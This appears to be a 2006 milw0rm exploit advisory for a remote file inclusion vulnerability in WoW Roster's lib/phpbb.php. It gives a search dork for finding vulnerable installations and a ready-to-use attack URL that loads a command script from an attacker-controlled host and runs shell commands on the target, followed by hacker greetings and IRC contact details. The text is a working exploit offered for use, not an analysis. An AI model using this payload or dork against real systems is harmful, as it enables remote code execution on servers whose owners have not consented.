-------------------------------------------------------------------------------- Title : WoW Roster (/lib/phpbb.php) Remote File Include Vulnerability -------------------------------------------------------------------------------- Affected software description : Application : World of Warcraft (WoW) Roster URL : http://www.wowroster.net/ -------------------------------------------------------------------------------- dork : "wow roster version 1.*" Exploit : -------------------------------------------------------------------------------- Usage: http://[target]/[roster_path]/lib/phpbb.php?subdir=http://[evilhost]/cmd.txt?&cmd=ls -------------------------------------------------------------------------------- greets: XLR, rdy, wiggle, phreek, menx [...] special greet: my old gf ;) -------------------------------------------------------------------------------- Contact: Nick: |peti on irc.quakenet.org/irc.efnet.net --------------------------------- [ eof ] -------------------------------------- # milw0rm.com [2006-08-02]